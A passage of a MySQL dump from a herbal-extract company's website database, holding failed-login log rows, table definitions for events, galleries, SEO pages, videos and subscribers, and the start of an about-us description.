18:55:47',0,'5.188.62.26','1','0'),(465,'Invalid details. Please try again with valid details',NULL,1690743347,'2023-07-30 18:55:47',0,'5.188.62.26','1','0'),(466,'Invalid details. Please try again with valid details',NULL,1690743353,'2023-07-30 18:55:53',0,'5.188.62.26','1','0'),(467,'Invalid details. Please try again with valid details',NULL,1690743354,'2023-07-30 18:55:54',0,'5.188.62.26','1','0'),(468,'Invalid details. Please try again with valid details',NULL,1690743359,'2023-07-30 18:55:59',0,'5.188.62.26','1','0'),(469,'Invalid details. Please try again with valid details',NULL,1690743360,'2023-07-30 18:56:00',0,'5.188.62.26','1','0'),(470,'Invalid details. Please try again with valid details',NULL,1690743364,'2023-07-30 18:56:04',0,'5.188.62.26','1','0'),(471,'Invalid details. Please try again with valid details',NULL,1690743367,'2023-07-30 18:56:07',0,'5.188.62.26','1','0'),(472,'Invalid details. Please try again with valid details',NULL,1690743372,'2023-07-30 18:56:12',0,'5.188.62.26','1','0'),(473,'Invalid details. Please try again with valid details',NULL,1690743372,'2023-07-30 18:56:12',0,'5.188.62.26','1','0'),(474,'Invalid details. Please try again with valid details',NULL,1690743377,'2023-07-30 18:56:17',0,'5.188.62.26','1','0'),(475,'Invalid details. Please try again with valid details',NULL,1690743379,'2023-07-30 18:56:19',0,'5.188.62.26','1','0'),(476,'Invalid details. Please try again with valid details',NULL,1690743384,'2023-07-30 18:56:24',0,'5.188.62.26','1','0'),(477,'Invalid details. Please try again with valid details',NULL,1690743385,'2023-07-30 18:56:25',0,'5.188.62.26','1','0'),(478,'Invalid details. Please try again with valid details',NULL,1690743390,'2023-07-30 18:56:30',0,'5.188.62.26','1','0'),(479,'Invalid details. Please try again with valid details',NULL,1690743391,'2023-07-30 18:56:31',0,'5.188.62.26','1','0'),(480,'Invalid details. Please try again with valid details',NULL,1690743396,'2023-07-30 18:56:36',0,'5.188.62.26','1','0'),(481,'Invalid details. Please try again with valid details',NULL,1690743397,'2023-07-30 18:56:37',0,'5.188.62.26','1','0'),(482,'Invalid details. Please try again with valid details',NULL,1690743403,'2023-07-30 18:56:43',0,'5.188.62.26','1','0'),(483,'Invalid details. Please try again with valid details',NULL,1690743405,'2023-07-30 18:56:45',0,'5.188.62.26','1','0'),(484,'Invalid details. Please try again with valid details',NULL,1690743410,'2023-07-30 18:56:50',0,'5.188.62.26','1','0'),(485,'Invalid details. Please try again with valid details',NULL,1690743410,'2023-07-30 18:56:50',0,'5.188.62.26','1','0'),(486,'Invalid details. Please try again with valid details',NULL,1690743415,'2023-07-30 18:56:55',0,'5.188.62.26','1','0'),(487,'Invalid details. Please try again with valid details',NULL,1690743416,'2023-07-30 18:56:56',0,'5.188.62.26','1','0'),(488,'Invalid details. Please try again with valid details',NULL,1690743421,'2023-07-30 18:57:01',0,'5.188.62.26','1','0'),(489,'Invalid details. Please try again with valid details',NULL,1690743422,'2023-07-30 18:57:02',0,'5.188.62.26','1','0'),(490,'Invalid details. Please try again with valid details',NULL,1690743428,'2023-07-30 18:57:08',0,'5.188.62.26','1','0'),(491,'Invalid details. Please try again with valid details',NULL,1690743429,'2023-07-30 18:57:09',0,'5.188.62.26','1','0'),(492,'Invalid details. Please try again with valid details',NULL,1690743434,'2023-07-30 18:57:14',0,'5.188.62.26','1','0'),(493,'Invalid details. Please try again with valid details',NULL,1690743435,'2023-07-30 18:57:16',0,'5.188.62.26','1','0'),(494,'Invalid details. Please try again with valid details',NULL,1690743441,'2023-07-30 18:57:21',0,'5.188.62.26','1','0'),(495,'Invalid details. Please try again with valid details',NULL,1690743442,'2023-07-30 18:57:22',0,'5.188.62.26','1','0'),(496,'Invalid details. Please try again with valid details',NULL,1690743447,'2023-07-30 18:57:27',0,'5.188.62.26','1','0'),(497,'Invalid details. Please try again with valid details',NULL,1690743448,'2023-07-30 18:57:28',0,'5.188.62.26','1','0'),(498,'Invalid details. Please try again with valid details',NULL,1690743453,'2023-07-30 18:57:33',0,'5.188.62.26','1','0'),(499,'Invalid details. Please try again with valid details',NULL,1690743454,'2023-07-30 18:57:34',0,'5.188.62.26','1','0'),(500,'Invalid details. Please try again with valid details',NULL,1690743459,'2023-07-30 18:57:39',0,'5.188.62.26','1','0'),(501,'Invalid details. Please try again with valid details',NULL,1690743461,'2023-07-30 18:57:41',0,'5.188.62.26','1','0'),(502,'Invalid details. Please try again with valid details',NULL,1690743466,'2023-07-30 18:57:46',0,'5.188.62.26','1','0'),(503,'Invalid details. Please try again with valid details',NULL,1690743467,'2023-07-30 18:57:47',0,'5.188.62.26','1','0'),(504,'Invalid details. Please try again with valid details',NULL,1690743472,'2023-07-30 18:57:52',0,'5.188.62.26','1','0'),(505,'Invalid details. Please try again with valid details',NULL,1690743473,'2023-07-30 18:57:53',0,'5.188.62.26','1','0'),(506,'Invalid details. Please try again with valid details',NULL,1690743479,'2023-07-30 18:57:59',0,'5.188.62.26','1','0'),(507,'Invalid details. Please try again with valid details',NULL,1690743480,'2023-07-30 18:58:00',0,'5.188.62.26','1','0'),(508,'Invalid details. Please try again with valid details',NULL,1690743484,'2023-07-30 18:58:04',0,'5.188.62.26','1','0'),(509,'Invalid details. Please try again with valid details',NULL,1690743487,'2023-07-30 18:58:07',0,'5.188.62.26','1','0'),(510,'Invalid details. Please try again with valid details',NULL,1690743491,'2023-07-30 18:58:11',0,'5.188.62.26','1','0'),(511,'Invalid details. Please try again with valid details',NULL,1690743492,'2023-07-30 18:58:12',0,'5.188.62.26','1','0'),(512,'Invalid details. Please try again with valid details',NULL,1690743497,'2023-07-30 18:58:17',0,'5.188.62.26','1','0'),(513,'Invalid details. Please try again with valid details',NULL,1690743499,'2023-07-30 18:58:19',0,'5.188.62.26','1','0'),(514,'Invalid details. Please try again with valid details',NULL,1690743503,'2023-07-30 18:58:23',0,'5.188.62.26','1','0'),(515,'Invalid details. Please try again with valid details',NULL,1690743506,'2023-07-30 18:58:26',0,'5.188.62.26','1','0'),(516,'Invalid details. Please try again with valid details',NULL,1690743510,'2023-07-30 18:58:30',0,'5.188.62.26','1','0'),(517,'Invalid details. Please try again with valid details',NULL,1690743511,'2023-07-30 18:58:31',0,'5.188.62.26','1','0'),(518,'Invalid details. Please try again with valid details',NULL,1690743516,'2023-07-30 18:58:36',0,'5.188.62.26','1','0'),(519,'Invalid details. Please try again with valid details',NULL,1690743521,'2023-07-30 18:58:41',0,'5.188.62.26','1','0'),(520,'Invalid details. Please try again with valid details',NULL,1690743525,'2023-07-30 18:58:45',0,'5.188.62.26','1','0'),(521,'Invalid details. Please try again with valid details',NULL,1690743525,'2023-07-30 18:58:45',0,'5.188.62.26','1','0'),(522,'Invalid details. Please try again with valid details',NULL,1690743530,'2023-07-30 18:58:50',0,'5.188.62.26','1','0'),(523,'Invalid details. Please try again with valid details',NULL,1690743531,'2023-07-30 18:58:51',0,'5.188.62.26','1','0'),(524,'Invalid details. Please try again with valid details',NULL,1690743536,'2023-07-30 18:58:56',0,'5.188.62.26','1','0'),(525,'Invalid details. Please try again with valid details',NULL,1690743538,'2023-07-30 18:58:58',0,'5.188.62.26','1','0'),(526,'Invalid details. Please try again with valid details',NULL,1690743543,'2023-07-30 18:59:03',0,'5.188.62.26','1','0'),(527,'Invalid details. Please try again with valid details',NULL,1690743544,'2023-07-30 18:59:04',0,'5.188.62.26','1','0'),(528,'Invalid details. Please try again with valid details',NULL,1690743550,'2023-07-30 18:59:10',0,'5.188.62.26','1','0'),(529,'Invalid details. Please try again with valid details',NULL,1690743551,'2023-07-30 18:59:11',0,'5.188.62.26','1','0'),(530,'Invalid details. Please try again with valid details',NULL,1690743555,'2023-07-30 18:59:15',0,'5.188.62.26','1','0'),(531,'Invalid details. Please try again with valid details',NULL,1690743558,'2023-07-30 18:59:18',0,'5.188.62.26','1','0'),(532,'Invalid details. Please try again with valid details',NULL,1690743563,'2023-07-30 18:59:23',0,'5.188.62.26','1','0'),(533,'Invalid details. Please try again with valid details',NULL,1690743563,'2023-07-30 18:59:23',0,'5.188.62.26','1','0'),(534,'Invalid details. Please try again with valid details',NULL,1690743567,'2023-07-30 18:59:27',0,'5.188.62.26','1','0'),(535,'Invalid details. Please try again with valid details',NULL,1690743569,'2023-07-30 18:59:29',0,'5.188.62.26','1','0'),(536,'Invalid details. Please try again with valid details',NULL,1690743574,'2023-07-30 18:59:34',0,'5.188.62.26','1','0'),(537,'Invalid details. Please try again with valid details',NULL,1690743575,'2023-07-30 18:59:35',0,'5.188.62.26','1','0'),(538,'Invalid details. Please try again with valid details',NULL,1690743579,'2023-07-30 18:59:39',0,'5.188.62.26','1','0'),(539,'Invalid details. Please try again with valid details',NULL,1690743581,'2023-07-30 18:59:41',0,'5.188.62.26','1','0'),(540,'Invalid details. Please try again with valid details',NULL,1690743587,'2023-07-30 18:59:47',0,'5.188.62.26','1','0'),(541,'Invalid details. Please try again with valid details',NULL,1690743588,'2023-07-30 18:59:48',0,'5.188.62.26','1','0'),(542,'Invalid details. Please try again with valid details',NULL,1690743594,'2023-07-30 18:59:54',0,'5.188.62.26','1','0'),(543,'Invalid details. Please try again with valid details',NULL,1690743594,'2023-07-30 18:59:54',0,'5.188.62.26','1','0'),(544,'Invalid details. Please try again with valid details',NULL,1690743600,'2023-07-30 19:00:00',0,'5.188.62.26','1','0'),(545,'Invalid details. Please try again with valid details',NULL,1690743601,'2023-07-30 19:00:01',0,'5.188.62.26','1','0'),(546,'Invalid details. Please try again with valid details',NULL,1690743605,'2023-07-30 19:00:05',0,'5.188.62.26','1','0'),(547,'Invalid details. Please try again with valid details',NULL,1690743607,'2023-07-30 19:00:07',0,'5.188.62.26','1','0'),(548,'Invalid details. Please try again with valid details',NULL,1690743612,'2023-07-30 19:00:12',0,'5.188.62.26','1','0'),(549,'Invalid details. Please try again with valid details',NULL,1690743613,'2023-07-30 19:00:13',0,'5.188.62.26','1','0'),(550,'Invalid details. Please try again with valid details',NULL,1690743618,'2023-07-30 19:00:18',0,'5.188.62.26','1','0'),(551,'Invalid details. Please try again with valid details',NULL,1690743620,'2023-07-30 19:00:20',0,'5.188.62.26','1','0'),(552,'Invalid details. Please try again with valid details',NULL,1690743624,'2023-07-30 19:00:24',0,'5.188.62.26','1','0'),(553,'Invalid details. Please try again with valid details',NULL,1690743626,'2023-07-30 19:00:26',0,'5.188.62.26','1','0'),(554,'Invalid details. Please try again with valid details',NULL,1690743631,'2023-07-30 19:00:31',0,'5.188.62.26','1','0'),(555,'Invalid details. Please try again with valid details',NULL,1690743632,'2023-07-30 19:00:32',0,'5.188.62.26','1','0'),(556,'Invalid details. Please try again with valid details',NULL,1690743636,'2023-07-30 19:00:36',0,'5.188.62.26','1','0'),(557,'Invalid details. Please try again with valid details',NULL,1690743638,'2023-07-30 19:00:38',0,'5.188.62.26','1','0'),(558,'Invalid details. Please try again with valid details',NULL,1690743643,'2023-07-30 19:00:43',0,'5.188.62.26','1','0'),(559,'Invalid details. Please try again with valid details',NULL,1690743644,'2023-07-30 19:00:44',0,'5.188.62.26','1','0'),(560,'Invalid details. Please try again with valid details',NULL,1690743649,'2023-07-30 19:00:49',0,'5.188.62.26','1','0'),(561,'Invalid details. Please try again with valid details',NULL,1690743650,'2023-07-30 19:00:50',0,'5.188.62.26','1','0'),(562,'Invalid details. Please try again with valid details',NULL,1690743655,'2023-07-30 19:00:55',0,'5.188.62.26','1','0'),(563,'Invalid details. Please try again with valid details',NULL,1690743656,'2023-07-30 19:00:56',0,'5.188.62.26','1','0'),(564,'Invalid details. Please try again with valid details',NULL,1690743661,'2023-07-30 19:01:01',0,'5.188.62.26','1','0'),(565,'Invalid details. Please try again with valid details',NULL,1690743662,'2023-07-30 19:01:02',0,'5.188.62.26','1','0'),(566,'Invalid details. Please try again with valid details',NULL,1690743667,'2023-07-30 19:01:07',0,'5.188.62.26','1','0'),(567,'Invalid details. Please try again with valid details',NULL,1690743668,'2023-07-30 19:01:08',0,'5.188.62.26','1','0'),(568,'Invalid details. Please try again with valid details',NULL,1690743673,'2023-07-30 19:01:13',0,'5.188.62.26','1','0'),(569,'Invalid details. Please try again with valid details',NULL,1690743674,'2023-07-30 19:01:14',0,'5.188.62.26','1','0'),(570,'Invalid details. Please try again with valid details',NULL,1690743679,'2023-07-30 19:01:19',0,'5.188.62.26','1','0'),(571,'Invalid details. Please try again with valid details',NULL,1690743680,'2023-07-30 19:01:20',0,'5.188.62.26','1','0'),(572,'Invalid details. Please try again with valid details',NULL,1690743684,'2023-07-30 19:01:24',0,'5.188.62.26','1','0'),(573,'Invalid details. Please try again with valid details',NULL,1690743686,'2023-07-30 19:01:26',0,'5.188.62.26','1','0'),(574,'Invalid details. Please try again with valid details',NULL,1690743691,'2023-07-30 19:01:31',0,'5.188.62.26','1','0'),(575,'Invalid details. Please try again with valid details',NULL,1690743692,'2023-07-30 19:01:32',0,'5.188.62.26','1','0'),(576,'Invalid details. Please try again with valid details',NULL,1690743697,'2023-07-30 19:01:37',0,'5.188.62.26','1','0'),(577,'Invalid details. Please try again with valid details',NULL,1690743698,'2023-07-30 19:01:38',0,'5.188.62.26','1','0'),(578,'Invalid details. Please try again with valid details',NULL,1690743703,'2023-07-30 19:01:43',0,'5.188.62.26','1','0'),(579,'Invalid details. Please try again with valid details',NULL,1690743704,'2023-07-30 19:01:44',0,'5.188.62.26','1','0'),(580,'Invalid details. Please try again with valid details',NULL,1690743708,'2023-07-30 19:01:48',0,'5.188.62.26','1','0'),(581,'Invalid details. Please try again with valid details',NULL,1690743710,'2023-07-30 19:01:50',0,'5.188.62.26','1','0'),(582,'Invalid details. Please try again with valid details',NULL,1690743715,'2023-07-30 19:01:55',0,'5.188.62.26','1','0'),(583,'Invalid details. Please try again with valid details',NULL,1690743716,'2023-07-30 19:01:56',0,'5.188.62.26','1','0'),(584,'Invalid details. Please try again with valid details',NULL,1690743720,'2023-07-30 19:02:00',0,'5.188.62.26','1','0'),(585,'Invalid details. Please try again with valid details',NULL,1690743722,'2023-07-30 19:02:02',0,'5.188.62.26','1','0'),(586,'Invalid details. Please try again with valid details',NULL,1690743726,'2023-07-30 19:02:06',0,'5.188.62.26','1','0'),(587,'Invalid details. Please try again with valid details',NULL,1690743728,'2023-07-30 19:02:08',0,'5.188.62.26','1','0'),(588,'Invalid details. Please try again with valid details',NULL,1690743732,'2023-07-30 19:02:12',0,'5.188.62.26','1','0'),(589,'Invalid details. Please try again with valid details',NULL,1690743733,'2023-07-30 19:02:13',0,'5.188.62.26','1','0'),(590,'Invalid details. Please try again with valid details',NULL,1690743738,'2023-07-30 19:02:18',0,'5.188.62.26','1','0'),(591,'Invalid details. Please try again with valid details',NULL,1690743739,'2023-07-30 19:02:19',0,'5.188.62.26','1','0'),(592,'Invalid details. Please try again with valid details',NULL,1690743745,'2023-07-30 19:02:25',0,'5.188.62.26','1','0'),(593,'Invalid details. Please try again with valid details',NULL,1690743746,'2023-07-30 19:02:26',0,'5.188.62.26','1','0'),(594,'Invalid details. Please try again with valid details',NULL,1690743750,'2023-07-30 19:02:30',0,'5.188.62.26','1','0'),(595,'Invalid details. Please try again with valid details',NULL,1690743752,'2023-07-30 19:02:32',0,'5.188.62.26','1','0'),(596,'Invalid details. Please try again with valid details',NULL,1690743757,'2023-07-30 19:02:37',0,'5.188.62.26','1','0'),(597,'Invalid details. Please try again with valid details',NULL,1690743757,'2023-07-30 19:02:37',0,'5.188.62.26','1','0'),(598,'Invalid details. Please try again with valid details',NULL,1690743762,'2023-07-30 19:02:42',0,'5.188.62.26','1','0'),(599,'Invalid details. Please try again with valid details',NULL,1690743764,'2023-07-30 19:02:44',0,'5.188.62.26','1','0'),(600,'Invalid details. Please try again with valid details',NULL,1690743769,'2023-07-30 19:02:49',0,'5.188.62.26','1','0'),(601,'Invalid details. Please try again with valid details',NULL,1690743770,'2023-07-30 19:02:50',0,'5.188.62.26','1','0'),(602,'Invalid details. Please try again with valid details',NULL,1690743774,'2023-07-30 19:02:54',0,'5.188.62.26','1','0'),(603,'Invalid details. Please try again with valid details',NULL,1690743776,'2023-07-30 19:02:56',0,'5.188.62.26','1','0'),(604,'Invalid details. Please try again with valid details',NULL,1690743781,'2023-07-30 19:03:01',0,'5.188.62.26','1','0'),(605,'Invalid details. Please try again with valid details',NULL,1690743782,'2023-07-30 19:03:02',0,'5.188.62.26','1','0'),(606,'Invalid details. Please try again with valid details',NULL,1690743786,'2023-07-30 19:03:06',0,'5.188.62.26','1','0'),(607,'Invalid details. Please try again with valid details',NULL,1690743788,'2023-07-30 19:03:08',0,'5.188.62.26','1','0'),(608,'Invalid details. Please try again with valid details',NULL,1690743792,'2023-07-30 19:03:12',0,'5.188.62.26','1','0'),(609,'Invalid details. Please try again with valid details',NULL,1690743794,'2023-07-30 19:03:14',0,'5.188.62.26','1','0'),(610,'Invalid details. Please try again with valid details',NULL,1690743799,'2023-07-30 19:03:19',0,'5.188.62.26','1','0'),(611,'Invalid details. Please try again with valid details',NULL,1690743800,'2023-07-30 19:03:20',0,'5.188.62.26','1','0'),(612,'Invalid details. Please try again with valid details',NULL,1690743805,'2023-07-30 19:03:25',0,'5.188.62.26','1','0'),(613,'Invalid details. Please try again with valid details',NULL,1690743806,'2023-07-30 19:03:26',0,'5.188.62.26','1','0'),(614,'Invalid details. Please try again with valid details',NULL,1690743811,'2023-07-30 19:03:31',0,'5.188.62.26','1','0'),(615,'Invalid details. Please try again with valid details',NULL,1690743812,'2023-07-30 19:03:32',0,'5.188.62.26','1','0'),(616,'Invalid details. Please try again with valid details',NULL,1690743817,'2023-07-30 19:03:37',0,'5.188.62.26','1','0'),(617,'Invalid details. Please try again with valid details',NULL,1690743818,'2023-07-30 19:03:38',0,'5.188.62.26','1','0'),(618,'Invalid details. Please try again with valid details',NULL,1690743823,'2023-07-30 19:03:43',0,'5.188.62.26','1','0'),(619,'Invalid details. Please try again with valid details',NULL,1690743824,'2023-07-30 19:03:44',0,'5.188.62.26','1','0'),(620,'Invalid details. Please try again with valid details',NULL,1690743829,'2023-07-30 19:03:49',0,'5.188.62.26','1','0'),(621,'Invalid details. Please try again with valid details',NULL,1690743830,'2023-07-30 19:03:50',0,'5.188.62.26','1','0'),(622,'Invalid details. Please try again with valid details',NULL,1690743835,'2023-07-30 19:03:55',0,'5.188.62.26','1','0'),(623,'Invalid details. Please try again with valid details',NULL,1690743836,'2023-07-30 19:03:56',0,'5.188.62.26','1','0'),(624,'Invalid details. Please try again with valid details',NULL,1690743841,'2023-07-30 19:04:01',0,'5.188.62.26','1','0'),(625,'Invalid details. Please try again with valid details',NULL,1690743842,'2023-07-30 19:04:02',0,'5.188.62.26','1','0'),(626,'Invalid details. Please try again with valid details',NULL,1690743847,'2023-07-30 19:04:07',0,'5.188.62.26','1','0'),(627,'Invalid details. Please try again with valid details',NULL,1690743848,'2023-07-30 19:04:08',0,'5.188.62.26','1','0'),(628,'Invalid details. Please try again with valid details',NULL,1690743853,'2023-07-30 19:04:13',0,'5.188.62.26','1','0'),(629,'Invalid details. Please try again with valid details',NULL,1690743855,'2023-07-30 19:04:15',0,'5.188.62.26','1','0'),(630,'Invalid details. Please try again with valid details',NULL,1690743859,'2023-07-30 19:04:19',0,'5.188.62.26','1','0'),(631,'Invalid details. Please try again with valid details',NULL,1690743860,'2023-07-30 19:04:20',0,'5.188.62.26','1','0'),(632,'Invalid details. Please try again with valid details',NULL,1690743865,'2023-07-30 19:04:25',0,'5.188.62.26','1','0');

/*Table structure for table `languages` */

DROP TABLE IF EXISTS `languages`;

CREATE TABLE `languages` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `abbr` varchar(5) NOT NULL,
  `name` varchar(30) NOT NULL,
  `currency` varchar(10) NOT NULL,
  `currencyKey` varchar(5) NOT NULL,
  `flag` varchar(255) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

/*Data for the table `languages` */

/*Table structure for table `su_eventdetails` */

DROP TABLE IF EXISTS `su_eventdetails`;

CREATE TABLE `su_eventdetails` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `event_id` int(11) NOT NULL,
  `slug` varchar(250) DEFAULT NULL,
  `event_name` varchar(250) DEFAULT NULL,
  `display_name` varchar(250) NOT NULL,
  `event_duration` varchar(50) DEFAULT NULL,
  `event_location` varchar(250) DEFAULT NULL,
  `event_details` text NOT NULL,
  `description` text NOT NULL,
  `terms_condition` text NOT NULL,
  `custom` varchar(250) NOT NULL,
  `event_category` varchar(100) DEFAULT NULL,
  `event_date` date DEFAULT NULL,
  `entry_fee` varchar(50) DEFAULT NULL,
  `event_starttime` varchar(50) DEFAULT NULL,
  `event_endtime` varchar(50) DEFAULT NULL,
  `event_banner` varchar(50) DEFAULT NULL,
  `event_video` varchar(150) DEFAULT NULL,
  `external_url` varchar(200) DEFAULT NULL,
  `display_order` int(11) DEFAULT NULL,
  `status` enum('1','0') NOT NULL DEFAULT '1',
  `youtube_url` varchar(150) DEFAULT NULL,
  `banner_type` enum('Image','Video','Youtube') DEFAULT 'Image',
  `seo_title` varchar(150) DEFAULT NULL,
  `seo_description` varchar(250) DEFAULT NULL,
  `seo_keywords` varchar(250) DEFAULT NULL,
  `is_deleted` enum('1','0') NOT NULL DEFAULT '0',
  `createdon` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `modifiedon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

/*Data for the table `su_eventdetails` */

/*Table structure for table `su_eventsgallery_albums` */

DROP TABLE IF EXISTS `su_eventsgallery_albums`;

CREATE TABLE `su_eventsgallery_albums` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `album_title` varchar(150) NOT NULL,
  `school_id` int(11) DEFAULT NULL,
  `event_id` int(11) DEFAULT NULL,
  `album_image` varchar(100) NOT NULL,
  `album_url` varchar(150) DEFAULT NULL,
  `display_order` int(11) DEFAULT NULL,
  `album_type` char(3) DEFAULT NULL,
  `status` enum('1','0') NOT NULL DEFAULT '1',
  `is_deleted` enum('1','0') NOT NULL DEFAULT '0',
  `modifiedon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `createdon` datetime NOT NULL,
  `album_date` date DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

/*Data for the table `su_eventsgallery_albums` */

/*Table structure for table `su_eventsgallery_images` */

DROP TABLE IF EXISTS `su_eventsgallery_images`;

CREATE TABLE `su_eventsgallery_images` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `album_id` int(11) NOT NULL,
  `photo_title` varchar(150) NOT NULL,
  `photo_image` varchar(100) NOT NULL,
  `photo_url` varchar(100) DEFAULT NULL,
  `photo_text` varchar(250) DEFAULT NULL,
  `status` enum('1','0') NOT NULL DEFAULT '1',
  `display_order` int(11) DEFAULT NULL,
  `is_deleted` enum('1','0') NOT NULL DEFAULT '0',
  `createdon` datetime NOT NULL,
  `modifiedon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

/*Data for the table `su_eventsgallery_images` */

/*Table structure for table `su_seo_pages` */

DROP TABLE IF EXISTS `su_seo_pages`;

CREATE TABLE `su_seo_pages` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(250) NOT NULL,
  `h1_tag` varchar(250) DEFAULT NULL,
  `description` text NOT NULL,
  `keywords` text NOT NULL,
  `custom` varchar(250) NOT NULL,
  `slug` varchar(100) DEFAULT NULL,
  `display_order` int(11) DEFAULT NULL,
  `status` enum('1','0') NOT NULL DEFAULT '1',
  `is_deleted` enum('1','0') NOT NULL DEFAULT '0',
  `createdon` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `modifiedon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=16 DEFAULT CHARSET=latin1;

/*Data for the table `su_seo_pages` */

insert  into `su_seo_pages`(`id`,`title`,`h1_tag`,`description`,`keywords`,`custom`,`slug`,`display_order`,`status`,`is_deleted`,`createdon`,`modifiedon`) values (1,'Home Page | shardaveda.com','','Home Page','Home Page','','home',1,'1','0','2021-09-06 10:54:44','2021-09-06 10:54:44'),(2,'About | shardaveda.com','','about shardaveda.com','about','','about',1,'1','0','2021-09-16 09:26:26','2021-09-16 09:26:26'),(3,'Products | shardaveda.com','','product','product','','product',1,'1','0','2021-09-16 09:34:16','2021-09-16 09:34:16'),(4,'Knowledge Centre','','knowledge-centre','knowledge-centre','','knowledge-centre',1,'1','0','2021-09-16 09:34:57','2021-09-16 09:34:57'),(5,'Contact | shardaveda.com','','contact','contact','','contact',1,'1','0','2021-09-16 09:35:12','2021-09-16 09:35:12'),(6,'career | shardaveda.com','','career','career','','career',1,'1','0','2021-09-16 09:35:32','2021-09-16 09:35:32'),(7,'team | shardaveda.com','','team','team','','team',1,'1','0','2021-09-16 09:35:49','2021-09-16 09:35:49'),(8,'faq | shardaveda.com','','faq','faq','','faq',1,'1','0','2021-09-16 09:36:05','2021-09-16 09:36:05'),(9,'disclaimer | shardaveda.com','','disclaimer','disclaimer','','disclaimer',1,'1','0','2021-09-16 09:36:57','2021-09-16 09:36:57'),(10,'Privacypolicy | shardaveda.com','','privacypolicy','privacypolicy','','privacypolicy',1,'1','0','2021-09-16 09:37:24','2021-09-16 09:37:24'),(11,'termsofuse','','termsofuse','termsofuse','','termsofuse',1,'1','0','2021-09-16 09:37:34','2021-09-16 09:37:34'),(12,'company-background','','company-background','company-background','','company-background',1,'1','0','2021-09-16 09:38:05','2021-09-16 09:38:05'),(13,'project-background','','project-background','project-background','','project-background',1,'1','0','2021-09-16 09:38:19','2021-09-16 09:38:19'),(14,'scenario-india','','scenario-india','scenario-india','','scenario-india',1,'1','0','2021-09-16 09:38:34','2021-09-16 09:38:34'),(15,'project-highlights','','project-highlights','project-highlights','','project-highlights',1,'1','0','2021-09-16 09:38:49','2021-09-16 09:38:49');

/*Table structure for table `su_videos` */

DROP TABLE IF EXISTS `su_videos`;

CREATE TABLE `su_videos` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `album_id` int(11) DEFAULT NULL,
  `school_id` int(11) DEFAULT NULL,
  `video_name` varchar(250) NOT NULL,
  `video_url` varchar(250) NOT NULL,
  `video_file` varchar(150) DEFAULT NULL,
  `video_code` varchar(50) NOT NULL,
  `video_type` enum('0','1','2','3','4','5','6') DEFAULT '0',
  `video_text` text,
  `youtube_url` varchar(200) DEFAULT NULL,
  `display_order` int(11) DEFAULT NULL,
  `status` enum('1','0') NOT NULL DEFAULT '1',
  `is_deleted` enum('1','0') NOT NULL DEFAULT '0',
  `createdon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `modifiedon` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

/*Data for the table `su_videos` */

/*Table structure for table `subscribed` */

DROP TABLE IF EXISTS `subscribed`;

CREATE TABLE `subscribed` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `email` varchar(255) NOT NULL,
  `browser` varchar(255) NOT NULL,
  `ip` varchar(255) NOT NULL,
  `time` varchar(255) NOT NULL,
  `status` enum('1','0') DEFAULT '1',
  `is_deleted` enum('1','0') DEFAULT '0',
  `createdon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `modified_on` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;

/*Data for the table `subscribed` */

insert  into `subscribed`(`id`,`email`,`browser`,`ip`,`time`,`status`,`is_deleted`,`createdon`,`modified_on`) values (1,'abcd@gmail.xom','Chrome','172.31.13.67','1631776544','1','0','2021-09-16 07:15:44','2021-09-16 07:15:44');

/*Table structure for table `tbl_aboutus` */

DROP TABLE IF EXISTS `tbl_aboutus`;

CREATE TABLE `tbl_aboutus` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(100) DEFAULT NULL,
  `slug` varchar(150) NOT NULL,
  `aboutus_image` varchar(150) DEFAULT NULL,
  `description` text,
  `is_display_home` enum('Y','N') DEFAULT 'N',
  `status` enum('1','0') NOT NULL DEFAULT '1',
  `display_order` int(11) DEFAULT NULL,
  `is_deleted` enum('1','0') DEFAULT '0',
  `createdon` datetime NOT NULL,
  `modifiedon` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  `category` varchar(100) DEFAULT NULL,
  `youtube_url` varchar(150) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8;

/*Data for the table `tbl_aboutus` */

insert  into `tbl_aboutus`(`id`,`title`,`slug`,`aboutus_image`,`description`,`is_display_home`,`status`,`display_order`,`is_deleted`,`createdon`,`modifiedon`,`category`,`youtube_url`) values (1,'Overview','overview','about-banner.jpg','&lt;p&gt;ShardaVeda is a line of wellness and natural healing products from Maxwell Biotech Private Limited. We manufacture and export premium herbal extracts, extracting Kratom, Ginseng, Lemongrass, Chamomile, Aloe Vera and other herbal extracts from medicinal &amp;amp; aromatic plants maintaining highest quality standards. Our products are suitable for use in the field of weight loss supplements, body care products, food business and various industry cosmetics.&lt;/p&gt;\r\n\r\n&lt;p&gt;&lt;br /&gt;\r\nWith a head office and facility in Noida, we endeavor to supply quality extracts thorugh innovations. Customers can be assured that every products distributed by ShardaVeda are full of quality. With the use of modern technology, every step of the production is strictly controlled by a team of experts in 